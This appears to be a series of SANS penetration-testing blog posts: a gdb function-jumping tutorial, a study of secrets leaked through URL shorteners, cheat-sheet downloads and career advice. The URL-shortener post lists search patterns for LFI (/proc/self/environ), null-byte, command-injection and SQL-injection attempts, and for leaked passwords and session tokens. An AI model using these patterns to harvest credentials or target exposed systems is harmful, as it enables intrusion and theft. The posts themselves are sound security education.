Using gdb to Call Random Functions!

By Ron Bowes

Sometimes reverse engineering is graceful and purposeful, where you thread the needle just right to figure out some obscure, undocumented function and how it can be used to the best of your ability. This article isn’t about that.

In this post, we’ll look at how we can find hidden functionality by jumping to random functions in-memory! This is normally a good way to crash the program, but who knows? You might find a gem!

This technique is useful for finding hidden functionality, but it’s somewhat limited: it’ll only work for applications that you’re capable of debugging. With few exceptions (I’ve used a technique like this to break out of an improperly implemented sandbox before), this technique is primarily for analysis, not for exploitation or privilege escalation.

Creating a Test Binary

Let’s start by writing a simple toy program. You can download this program as a 32- and 64-bit Linux binary, as well as the source code and Makefile, here

Here’s the full code:


#include <stdio.h>

void random_function() {
  printf("You called me!\n");
}

int main(int argc, char *argv[]) {
  printf("Can you call random_function()?\n");
  printf("Press <enter> to continue\n");
  getchar();

  printf("Good bye!\n");
}

Put that in a file called jumpdemo.c and compile with the following command:

gcc -g -O0 -o jumpdemo jumpdemo.c

We add -O0 to the command line to prevent the compiler from performing optimizations such as deleting unused functions under the guise of “helping”. If you grabbed our source code, you can simply run make after extracting it.

Finding Interesting Functions

Let’s assume for the purposes of this post that the binaries are compiled with symbols. That means that you can see the function names! My favorite tool for analyzing binaries is IDA, but for our purposes, the nm command is more than sufficient:


$ nm ./jumpdemo
0000000000601040 B __bss_start
0000000000601030 D __data_start
0000000000601030 W data_start
0000000000601038 D __dso_handle
0000000000601040 D _edata
0000000000601048 B _end
0000000000400624 T _fini
                 U getchar@@GLIBC_2.2.5
                 w __gmon_start__
0000000000400400 T _init
0000000000400630 R _IO_stdin_used
                 w _ITM_deregisterTMCloneTable
                 w _ITM_registerTMCloneTable
                 w _Jv_RegisterClasses
0000000000400620 T __libc_csu_fini
00000000004005b0 T __libc_csu_init
                 U __libc_start_main@@GLIBC_2.2.5
0000000000400577 T main
                 U puts@@GLIBC_2.2.5
0000000000400566 T random_function
0000000000400470 T _start
0000000000601040 D __TMC_END__

Everything you see here is a symbol, and the ones with T in front are ones that we can actually call, but the ones that start with an underscore (‘_’) are built-in stuff that we can just ignore (in a “real” situation, you shouldn’t discount something simply because the name starts with an underscore, of course).

The two functions that might be interesting are “main” and “random_function”, so that’s what we’re going to target!

Load in gdb

Before we can call one of these functions, we need to run the project in gdb — the GNU Project Debugger. On the command line (from the directory containing the compiled jumpdemo binary), run ./jumpdemo in gdb:


$ gdb -q ./jumpdemo
Reading symbols from ./jumpdemo...(no debugging symbols found)...done.
(gdb)

The -q flag is simply to disable unnecessary output. After you get to the (gdb) prompt, the jumpdemo application is loaded and ready to run, but it hasn’t actually been started yet. You can verify that by trying to run a command such as continue:


(gdb) continue
The program is not being run.

gdb is an extremely powerful tool, with a ton of different commands. You can enter help into the prompt to learn more, and you can also use help <command> on any of the commands we use (such as help break) to get more details. Give it a try!

Simple Case: Just Call It!

Now that the program is ready to go in gdb, we can run it with the run command (don’t forget to try help run!). You’ll see the same output as you would if you’d run it directly until it ends, at which point we’re back in gdb. You can run it over and over if you desire, but that’s not really going to get you anywhere.

In order to modify the application at runtime, it is necessary to run the program and then stop it again before it finishes cleanly. The most common way is to use a breakpoint (help break) on main:


$ gdb -q ./jumpdemo
Reading symbols from ./jumpdemo...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x40057b
(gdb) 

Then run the binary and watch what happens:


(gdb) run
Starting program: /home/ron/blogs/jumpdemo

Breakpoint 1, 0x000000000040057b in main ()
(gdb) 

Now we have control of the application in the running (but paused) state! We can view/edit memory, modify registers, continue execution, jump to another part of the code, and much much more!

In our case, as I’m sure you’ve guessed by now, we’re going to move the program’s execution to another part of the program. Specifically, we’re just going to use gdb‘s jump command (help jump!) to resume execution at the start of random_function():


$ gdb -q ./jumpdemo
Reading symbols from ./jumpdemo...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x40057b
(gdb) run
Starting program: /home/ron/blogs/jumpdemo 

Breakpoint 1, 0x000000000040057b in main ()
(gdb) help jump
Continue program being debugged at specified line or address.
Usage: jump <location>
Give as argument either LINENUM or *ADDR, where ADDR is an expression
for an address to start at.
(gdb) jump random_function
Continuing at 0x40056a.
You called me!
[Inferior 1 (process 11391) exited with code 017]

We did it! The program printed, “You called me!”, which means we successfully ran random_function()! Exit code 017 means the process didn’t exit cleanly, but that is to be expected. We just ran an unexpected function with absolutely no context!

If for some reason you can’t get breakpoints to work (maybe the program was compiled without symbols and you don’t actually know where main is), you can do the same thing without breakpoints by pressing ctrl-c while the binary is running:


(gdb) run
Starting program: /home/ron/blogs/jumpdemo 
Can you call random_function()?
Press <enter> to continue
^C
Program received signal SIGINT, Interrupt.
0x00007ffff7b04260 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) jump random_function
Continuing at 0x40056a.
You called me!
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()

Don’t worry about the segmentation fault, like the 017 exit code above, it’s happening because the program has no idea what to do after it’s finished running random_function.

Another mildly interesting thing that you can do is jump back to main() to make the program think it’s starting over:


(gdb) run
Starting program: /home/ron/blogs/jumpdemo 
Can you call random_function()?
Press <enter> to continue
^C
Program received signal SIGINT, Interrupt.
0x00007ffff7b04260 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) jump main
Continuing at 0x40057b.
Can you call random_function()?
Press <enter> to continue

I use jump-back-to-main a lot while doing actual exploit development to check whether or not I actually have code execution without trying to develop working shellcode. If the program appears to start over, you’ve changed the current instruction!

Real-world Example

For a quick example of this technique doing something visible against a “real” application, I took a look through my tools/ folder for a simple command line Linux application, and found THC-Hydra. I compiled it the standard way — ./configure && make — and ran nm against it:


$ nm ./hydra
0000000000657abc b A
0000000000657cb4 B accntFlag
                 U alarm@@GLIBC_2.2.5
000000000043baf0 T alarming
0000000000657ae4 B alarm_went_off
00000000004266f0 T analyze_server_response
0000000000654200 B apop_challenge
                 U ASN1_OBJECT_free@@OPENSSL_1.0.0
                 U __assert_fail@@GLIBC_2.2.5
0000000000655c00 B auth_flag
0000000000657ab8 b B
0000000000408b60 T bail
000000000044b760 r base64digits
000000000044b6e0 r base64val
0000000000433450 T bf_get_pcount
…

Turns out, there are over 700 exported symbols. Wow! We can narrow it down by grepping for T, which refers to a symbol in the code section, but there are still a lot of those. I manually looked over the list to find ones that might work (ie, functions that might print output without having any valid context / parameters).

I started by running the application with a “normal” set of arguments to make note of the “normal” output:


$ gdb -q --args ./hydra -l john -p doe localhost http-head
Reading symbols from ./hydra...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/ron/tools/hydra-7.1-src/hydra -l john -p doe localhost http-head
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-15 14:47:12
Error: You must supply the web page as an additional option or via -m
[Inferior 1 (process 3619) exited with code 0377]
(gdb)

The only new thing here is --args which is simply a signal to gdb that there are going to be command line arguments to the binary.

After I determined what the output is supposed to look like, I set a breakpoint on main, like before, and jumped to help() after breaking:

$ gdb -q --args ./hydra -l john -p doe localhost http-head 
Reading symbols from ./hydra...(no debugging symbols found)...done. 
(gdb) break main 
Breakpoint 1 at 0x403bf0 
(gdb) run
Starting program: /home/ron/tools/hydra-7.1-src/hydra -l john -p doe localhost http-head [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, 0x0000000000403bf0 in main () 
(gdb) jump help 
Continuing at 0x408420. Syntax: (null) [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options: -R restore a previous aborted/crashed session -S perform an SSL connect ..

I tried help_bfg as well:


(gdb) jump help_bfg
Continuing at 0x408580.
Hydra bruteforce password generation option usage:

  -x MIN:MAX:CHARSET

     MIN     is the minimum number of characters in the password
     MAX     is the maximum number of characters in the password
     CHARSET is a specification of the characters to use in the generation
             valid CHARSET values are: 'a' for lowercase letters,
             'A' for uppercase letters, '1' for numbers, and for all others,
             just add their real representation.

Examples:
   -x 3:5:a  generate passwords from length 3 to 5 with all lowercase letters
   -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
   -x 1:3:/  generate passwords from length 1 to 3 containing only slashes
   -x 5:5:/%,.-  generate passwords with length 5 which consists only of /%,.-

The bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/
[Inferior 1 (process 9980) exited with code 0377]

Neat! Another help output! Although these are easy to get to legitimately, it’s really neat to see them called when they aren’t expected to be called! Stuff “just works”, kinda.

Speaking of kinda working, I also jumped to hydra_debug(), which had slightly more interesting results:


(gdb) jump hydra_debug
Continuing at 0x408b40.
[DEBUG] Code: ����   Time: 1539640228
[DEBUG] Options: mode 0  ssl 0  restore 0  showAttempt 0  tasks 0  max_use 0 tnp 0  tpsal 0  tprl 0  exit_found 0  miscptr (null)  service (null)
[DEBUG] Brains: active 0  targets 0  finished 0  todo_all 0  todo 0  sent 0  found 0  countlogin 0  sizelogin 0  countpass 0  sizepass 0
[Inferior 1 (process 7761) exited normally]

It does its best to print out the statistics, but because it didn’t expect that function to be called, it just prints nonsense.

Every other function I tried either does nothing or simply crashes the application. When you call a function that expects certain parameters without any such parameters, it normally tries to access invalid memory, so it’s pretty unsurprising. It’s actually surprising that it works at all! It’s pure luck that the string it tried to print is an invalid string rather than invalid memory (which would crash).

Conclusion

This may not seem like much, but it’s actually a very simple and straightforward reverse engineering technique that sometimes works shockingly well. Grab some open source applications, run nm on them, and try calling some functions. You never know what you’ll figure out!

–Ron Bowes
@iagox86

SANS Pen Test Poster: Pivots Payloads Boardgame

 

We are excited to introduce to you the new SANS Penetration Testing Educational Poster, “Pivots & Payloads Board Game”! It is a poster and a board game. How is it a board game? You can lay it down on a table, cut out the game pieces and game modifiers, use a dice to move your piece around the board…and play with your friends, colleagues, and/or family.

The board game takes you through pen test methodology, tactics, and tools with many possible setbacks that defenders can utilize to hinder forward progress for a pen tester or attacker. The game helps you learn while you play. It’s also a great way to showcase to others what pen testers do and how they do it.

We have made the poster/board game available to download, with additional downloads of the cheat sheets, game pieces, and game modifiers. We will add additional content to this blog page as we continue to evolve the board game and improve on it in future versions.

Download PDF of Pivots & Payloads:

http://blogs.sans.org/pen-testing/files/2018/11/PEN-PR-BGP_v1_1018_WEB_11052018.pdf

PEN-PR-BGP_v1_1018_WEB_FINAL_11052018_web_front

PEN-PR-BGP_v1_1018_WEB_FINAL_11052018_web_back

Additional Pivots & Payloads:

Desktop Wallpaper

PEN-PR-BGP_v1_1018_wallaperV1

PEN-PR-BGP_v1_1018_wallaperV2

Game Pieces – Print PDF

Pieces

Cheat Sheets – Print PDF

HashCat

Recon

NetCat

Pen Test Cheat Sheets:

SANS Pen Test Training:

SANS Pen Test Posters:

Build your Skills (Free):

SANS Penetration Testing Webcasts (YouTube):

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

The Secrets in URL Shortening Services

The secrets in URL shortening services

 

Authors: Chris Dale (@ChrisADale) and Vegar Linge Haaland (@vegarlh) created this post to bring awareness to the dangers of using URL shortening services. They both work at Netsecurity, a company which serves a multitude of customers, internationally, with services within networking, security operations, IR and Penetration Testing.

 

URL shortening services are common use for many today. They allow you to create convenient short URL’s that serves as a redirect to otherwise long and complex URLs. Such a shortened URL can look like this: https://bit.ly/2vmdGv8 . Once clicked, you will be immediately redirect to whichever URL bit.ly has stored behind the magic value of 2vmdGv8. A team from archiveteam.org, called URLTeam, has taken on the task of discovering what secrets these magic values hold.

 

URLTeam’s mission is to take these shortening services, i.e. https://bit.ly, https://tinyurl.com, and bruteforce the possible values they can hold for their magic values. Currently the team is working across a bunch of shortening services, all of which can be found here: https://www.archiveteam.org/index.php?title=URLTeam#URL_shorteners, currently about a 130 different services supported. Their efforts effectively reveal the destination redirect of the magic values, and we can very quickly find juicy information!

 

Some of the information one can find are e.g. URLs pointing to file shares otherwise un-discoverable, links to testing and staging systems and even some “attack-in-progress” URL’s where we can see attacks against target systems. For penetration testers, searching through the bruteforced results might be a helpful addition to the reconnaissance process, as it might reveal endpoints and systems which would have previously gone undiscovered..

This blog post describes how to set yourself up with a setup for easy searching through this amazing set of data. That’s what we got for you in this post. First, some analysis of the data available, and then some quick and dirty setup descriptions to make this amazing data-set available for yourself.

image3

 

Revealing secrets

Let’s take a look at what type of sensitive, funny and otherwise interesting information we can find  in URL shortener data. Below are some examples of the things we found by just casually searching, and utilizing Google Hacking Database (https://www.exploit-db.com/google-hacking-database/) type of searches. We have tried to redac the domain names in question in order to protect the companies vulnerable.

 

Hack in-progress

First out is the “Hack In-Progress” type of URLs. I am guessing black-hats, and perhaps others too, are using these to share their work in progress with their peers. Some of the identified URLs seem to be simple Proof-Of-Concepts, while others are designed for data exfiltration.

 

Below we see attacks trying to exploit a Local File Inclusion (LFI) by including the Linux file /proc/self/environ. This file is commonly abused to try get a shell from having found a LFI vulnerability.

Search term Example data
 {“wildcard”: {“uri_param.keyword”: “*/proc/self/environ”}}  image9

Then we can see some further expansions on the LFI vulnerabilities, using a Nullbyte (%00) to abuse string terminations, a common vulnerability on e.g. older PHP installations.

Search term Example data
{“wildcard”:{“uri_param.keyword”:”*%00″}}  image15

We also see attacks containing carriage-return (%0D) and line-feeds (%0A). In this example we see an attempted command injection, trying to ping the localhost 5 times. The attacker will measure the time taken from a normal request, i.e. without attack payload in it, vs. the request below. If the time taken for the request to complete is approximately 5 seconds higher using the attack, it confirms the attack vector and a command injection is very likely to be possible.

Search term Example data
{“wildcard”:{“uri_param.keyword”:”*%0a”}}  image19

And finally, of course, SQL Injection queries.

 

Search term Example data
“Union all”  image20

 

Backup data

Next up in line of examples is backed up data. Many developers and IT-operators make temporary backups available online. While sharing these, it is evident that some of them have used URL shorteners to make life more convenient. This vulnerability classifies as a information leak.

 

Search term Example data
{“wildcard”: {“uri_path.keyword”: “*.bak”}}

 

 image6
{“wildcard”:{“uri_path.keyword”:”*.sql”}}  image18

File sharing

Another common finding is people sharing files with no password protection, assuming that the random identifiers (magic values) will keep the documents safe. But when they use URL shortener they effectively share the URL with the world. In this case we’re looking for Google Documents, and honestly there is so many sensitive documents leaked here, across a plethora of different file sharing services.

 

Search term Example data
uri_domain:docs.google.com

 

 image14
uri_main_domain.keyword:mega.nz  image16
uri_main_domain.keyword:1drv.ms  image1

 

 

Booking reservations and similar

Cloud storage links are not the only passwordless links that are being shared online. Hotel and travel ticket systems also commonly send you emails with passwordless links for easy access to your booking details, as handily provided below:

 

Search term Example data
uri_domain:click.mail.hotels.com  image8

 

 

 

Test, Staging and Development environments

There are also a lot of test systems being deployed, and links are often shared between developers. Searching for test, beta, development etc. often reveal some interesting results as well.

 

Search term Example data
uri_lastsub_domain:test  image13
uri_lastsub_domain.keyword:staging  image11

 

Login tokens and passwords

Session tokens in URL’s have for years been considered as a bad practice, primarily because proxies and shoulder surfing attacks could potentially compromise your current session. In the dataset there were many examples of URL’s containing sensitive info, e.g tokens and passwords.

Search parameter Example data
{“wildcard”:{“uri_param.keyword”:”*password=*”}}  image10
{“wildcard”:{“uri_param.keyword”:”*jsessionid=*”}}  image5

Conclusions

By looking at the archiveteam.org’s data it is very evident that sensitive data is being shortened unscrupulously. It is definite that these services are being used without properly thinking through who else can gain access to the URLs, a classic example of security through obscurity. Obviously, someone with bad intentions could abuse this to their advantage, but it is also clear that organizations could utilize these same services to look for their own data being leaked, and possibly compromised. Furthermore, penetration testers could use these techniques to look for their customer data, providing potential valuable intelligence into attack surface they could work on.

 

What type of vulnerabilities and information leaks can you find? Please share in the comments below. In the next section we share how to get this setup running on your own server, so you can start analyzing and protecting yourself.

 

Setup and Installation

A detailed description of the configuration in use would probably require it’s own article so to avoid making this one too long we will not go deep into the configuration in details but we will give a brief description of the components in use.

Our current setup involves two servers. One OpenBSD server which is used for fetching files and sending them to the database server, relaying https requests, and another running an ELK (Elasticsearch / Logstash / Kibana) stack. The ELK stack is running on FreeBSD with ZFS. It is  composed of the following components:

  • Elasticsearch: The database.
  • Logstash: Log and data-parser. Parses the data to a common format and feeds it into Elasticsearch.
  • Kibana: A web server and frontend for Elasticsearch.

 

Setting up these services are a common practice today, and there exists a multitude of tutorials on how to accomplish this today.

 

On the OpenBSD server we have a script for downloading archives from archive.org. Files are decompressed and content is appended to a file which is monitored by Filebeat. Filebeat then sends the data to Logstash on the server which is running on the Elasticsearch server. Logstash is set up with some custom grok filters which splits up the URLs into separate fields. We created some handy fields to use for filtering and graphs. Logstash then sends the processed data to elasticsearch. The data is stored in indices based on their top domain (.com .org .no etc). This is done to speed up searches for specific top level domains. Below you can see the fields we have extracted from the URLs.

image4

 

As an example, uri_lastsub_domain contains the bottom level domain name. This is handy for when you want to filter on any sub-domains starting with “api” or “dev” etc.

 

After feeding the data to the database we can start searching and looking through the data.

We can use the Discovery page in Kibana to discover interesting data. We can also use the Dev tools page to make more advanced queries, e.g. regex searches for hashes.

 

Example of use:

Searching through archives from the last 60 days, including only .com domains using the string “(union AND select) OR (select AND concat)” yields an amazing 6,995 results as per the following screenshot:

image17

The Kibana Dashboard allows us to present some colorful and useful graphs:

image2

 

Performance and Speed

Currently, the DB server with the ELK stack runs on a low end VPS. Searching for “test” through all 83,927,323 .com records currently in Elasticsearch, via Kibana, takes 3-5 seconds. Speed will depend on the type of search though, so if we want to search through a specific field for a non-analyzed string through the same index it takes about 23 seconds. Still not too bad. This is particular useful when a search term includes special characters.

 

Search Options

In Kibana the main search options are the search bar in Discover and custom queries using dev tools. The former is good for quick searches, and provides a nice list of the results. The listing can be easily modified to include the fields you need and you can modify as you go. When working with results in the discover page you can also easily filter on specific field data, allowing you to very easily to filter out uninteresting data as you browse though the results. This is shown in the screenshot below:

image12

 

The console UI in the dev tools page is a great place to build up specific queries. It let’s us query elasticsearch directly:

image7

Searching and processing data from the terminal

ElasticSearch results are returned in JSON format. This makes it easy to write tools to interact with the data, and also to process the data on e.g. a UNIX terminal. Let’s say we want to get all results containing the string “../” and see how many different domains we get hits on. To do this we can simply query the elasticsearch server with a curl and pipe the output to a file. For example:

curl -s -X POST -H "Content-Type: application/json" 'http://localhost:9200/logstash-shorturls-.com/_search?scroll=10m&size=5000' -d '

{

"query": {

"wildcard":{

"uri_param.keyword":"*../*"

}

}

}' > res

 

This normally results in a huge block of json text, so we pipe it to jq and extract just the information we need:

cat res | jq .hits.hits[]._source.uri_domain > res.dom

Finally we summon the power of standard Unix tools to process the data:

cat res.dom | cut -d"\"" -f2 | sort | uniq | wc -l

873

This could obviously be done all in a single command, without storing any files, however it is just a trivial example to show you that we can easily process the data in whichever manner we want. Now that we have the domains we can do more fun stuff like:

grep -f res.dom bug-bounty-domains.txt

 

Happy hunting!

 

SANS Note:

Chris Dale has four upcoming SANS Pen Test Webcasts scheduled –

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SANS Cheat Sheet: Python 3

 

by: Mark Baggett

Python 2 – The end of the world as we know it.

It will happen. In the year 2020 an event will occur that will alter the course of information security forever. What is this apocalyptic event? The end of life for Python 2. Is it that big of a deal? Meh. I’m just being dramatic. As of 2020 they will stop releasing updates and patches to Python 2. But Python 2 isn’t going anywhere. If history has taught us lessons about what happens to unsupported software then we will continue to see it running critical infrastructure and hospital equipment for many years to come. Those programs that run in Python 2 interpreters today will continue to run in Python 2 interpreters well after 2020. Sadly today some organizations are still running old Python 2.5 interpreters despite the fact that it is now 13 years old and has serious security issues. It’s pretty safe to say that we will continue to see Python 2 for the foreseeable future.

That said, I think it is a little short sighted to continue to develop new tools and automation in Python 2 today. Today you should definitely be developing new code that works in Python 3. Any new tools you purchase and plan to use for more than a year should run in Python 3. You should also evaluate the risk associated with running that old Python 2 interpreter that may have security vulnerabilities once it is no longer supported vs updating your code to work with a supported interpreter. As you look to the future you should do that with Python 3 in your sights.

SANS SEC573: Automating information Security with Python course and the associated GPYC certification rides the Python2/Python3 fence along with the rest of the Industry. The course teaches you to build new tools for automation of common defensive, forensics and offensive task in Python 3. Developing new tools in Python 3 will set you up for success moving forward. We also covers what you need to know to convert your existing Python 2 code to Python 3. If you need to continue to use Python 2 we will teach you how to write code that is forward compatible to Python 3 so you are ready to switch when you are eventually forced to. In my opinion it isn’t really a choice between Python 2 and Python 3. The answer is both. We will supporting both versions for a while. In celebration of that fact here are the SEC573 Python2 and Python3 cheat sheets available for you to download and print! Enjoy!

 

DOWNLOAD – Python 2.7 Cheat Sheet

Python2_7

DOWNLOAD – Python 3 Cheat Sheet

Python3

 

Pen Test Cheat Sheets:

 

SANS Pen Test Training:

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SANS Poster – White Board of Awesome Command Line Kung Fu (PDF Download)

 

by: SANS Pen Test Team

Imagine you are sitting at your desk and come across a great command line tip that will assist you in your career as an information security professional, so you jot the tip down on a note, post-it, or scrap sheet of paper and tape it to your white board… now imagine you do this all the time until your white board is completely full of useful tips you’ve found and can use daily.

That is the concept behind the SANS Pen Test Poster: White Board of Awesome Command Line Kung-Fu created by the SANS Pen Test Instructors. Each tip was submitted by the Pen Test Instructors and curated by SANS Fellow, Ed Skoudis.

We are giving you a complete white board full of tips you can use to become a better InfoSec professional.

Now it is available for you to download.

Download PDF – PENT-PSTR-WHITEBOARD-V3-0118_web.pdf

PENT-PSTR-WHITEBOARD-V3-0118_web_small

PENT-PSTR-WHITEBOARD-V3-0118_web_small_back

 

Additional Educational Posts based on the Poster:

Python:

“White Board” – Python – Python Debugger
“White Board” – Python – Python Reverse Shell!
“White Board” – Python – Pythonic Web Server
“White Board” – Python – Raw Shell -> Terminal
“White Board” – Python – Pythonic Web Client

Bash:

“White Board” – Bash – Useful IPv6 Pivot
“White Board” – Bash – Encrypted Exfil Channel!
“White Board” – Bash – What’s My Public IP Address?
“White Board” – Bash – Bash’s Built-In Netcat Client
“White Board” – Bash – Check Service Every Second
“White Board” – Bash – Make Output Easier to Read
“White Board” – Bash – Website Cloner
“White Board” – Bash – Sudo… Make Me a Sandwich
“White Board” – Bash – Find Juicy Stuff in File System

CMD.exe:

“White Board” – CMD.exe – C:\> netsh interface
“White Board” – CMD.exe – C:\> wmic process

PowerShell:

“White Board” – PowerShell – Add a Firewall Rule
“White Board” – PowerShell – Built-in Port Scanner!
“White Board” – PowerShell – Get Firewall Rules
“White Board” – PowerShell – One-Line Web Client
“White Board” – PowerShell – Ping Sweeper!
“White Board” – PowerShell – Find Juicy Stuff in the File System

 

Desktop Wallpapers based on Poster:

Bash, PowerShell, Python…

Python_1280x1024(example)

 

SANS Pen Test Training:

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

So You Wanna Be a Pen Tester? 3 Paths To Consider (Updated)

Tips for Entering the Penetration Testing Field

By Ed Skoudis

It’s an exciting time to be a professional penetration tester. As malicious computer attackers amp up the number and magnitude of their breaches, the information security industry needs an enormous amount of help in proactively finding and resolving vulnerabilities. Penetration testers who are able to identify flaws, understand them, and demonstrate their business impact through careful exploitation are an important piece of the defensive puzzle.

In the courses I teach on penetration testing, I’m frequently asked about how someone can land their first job in the field after they’ve acquired the appropriate technical skills and gained a good understanding of methodologies. Also, over the past decade, I’ve counseled a lot of my friends and acquaintances as they’ve moved into various penetration testing jobs. Although there are many different paths to pen test nirvana, let’s zoom into three of the most promising. It’s worth noting that these three paths aren’t mutually exclusive either. I know many people who started on the first path, jumped to the second mid-way, and later found themselves on path #3. Or, you can jumble them up in arbitrary order.

Path A: General Enterprise Security Practitioner Moving to Penetration Testing

First, you could parlay a job in the security group of an enterprise (whether a corporate, government, or educational position) into vulnerability assessment and then penetration testing. For example, today, you may be a security auditor, administrator, analyst, or a member of a Security Operations Center (SOC) team. Tell your management that you are keenly interested in vulnerability assessment and penetration testing, and offer your support in existing projects associated with those tasks. You might have to start by taking one for the team and putting in your own hours in helping out, without getting a break from your “regular” job. Consider this extra time an investment in yourself. At first, you could help with tasks such as project scoping, false positive reduction, and remediation verification. Later, offer help in preparing a high-quality penetration testing report. Over the space of several months or even a year, you’ll demonstrate increasing skills and can ask management or other groups in your enterprise for a move more directly in the heart of penetration testing work.

Path B: Working for a Company or Division that Focuses on Penetration Testing

There are many companies that provide third-party penetration testing services to other companies, including organizations such as Verizon, Trustwave, and FishNet Security. Many of these organizations are looking to hire exceptional penetration testers, especially those who have experience. If you have no direct penetration testing experience, you may still want to try your hand by applying for a junior role in such organizations. A solid background in secure networking, development, or operations will prove helpful. But, if experience is absolutely required, consider moving through Paths A or C to hone your skills before jumping to Path B.

Path C: Going Out on Your Own

If you are more entrepreneurially minded, you may want to consider forming your own small company on the side to do vulnerability assessment for local small businesses, such as a local florist or auto mechanic. Start with just vulnerability assessment services, and build your skills there before going into full-blown penetration testing. There are a couple of huge caveats to take into account with this path, though. First off, make sure you get a good draft contract and statement of work template drawn up by a lawyer to limit your liability. Next, get some liability and errors & omissions insurance for penetration testing. Such protection could cost a few thousand dollars annually, but is vital in doing this kind of work. Once you’ve built your vulnerability assessment capabilities, you may want to gradually start looking at carefully exploiting discovered flaws (when explicitly allowed in your Statements of Work) to move from vulnerability assessment to penetration testing. After your small business is humming, you may decide to stick with this path, growing your business, or jump into Paths A or B.

Regardless of whether you go down paths A, B, C, or your own unique approach to entering the penetration testing industry, always keep in mind that your reputation and trustworthiness are paramount in the information security field. Your name is your personal brand, so work hard, be honest, and always maintain your integrity. Additionally, build yourself a lab of four or five virtual machines so you can practice your technical skills regularly, running scanners, exploitation tools, and sniffers so you can understand your craft at a fine-grained level. Learn a scripting language such as Python or Ruby so you can start automating various aspects of your tasks and even extend the capabilities of tools such as the Metasploit framework. And, most of all, give back to the community by writing a blog, sharing your ideas and techniques, and releasing scripts and tools you’ve created. You see, to excel in pen testing, you can’t think of it as a job. It is a way of life. Building a sterling reputation and contributing to others is not only beneficial to the community, but it will provide many direct and indirect benefits to you as you move down your path from new penetration tester to seasoned professional.

Additional SANS Penetration Testing Resources

Watch: WEBCAST – So, You Wanna Be a Pen Tester?

EdSkoudis_SoYouWannaBeAPenTester_06192018

Available Now!
Recorded: 6/19/2108
https://www.sans.org/webcasts/so-wanna-pen-tester-3-paths-106920

 

Upcoming SANS Pen Test Webcasts:

Pen Test Cheat Sheets:

SANS Pen Test Posters:

Build your Skills (Free):

SANS Penetration Testing Webcasts (YouTube):

SANS Pen Test Training:

–Ed.

https://twitter.com/edskoudis

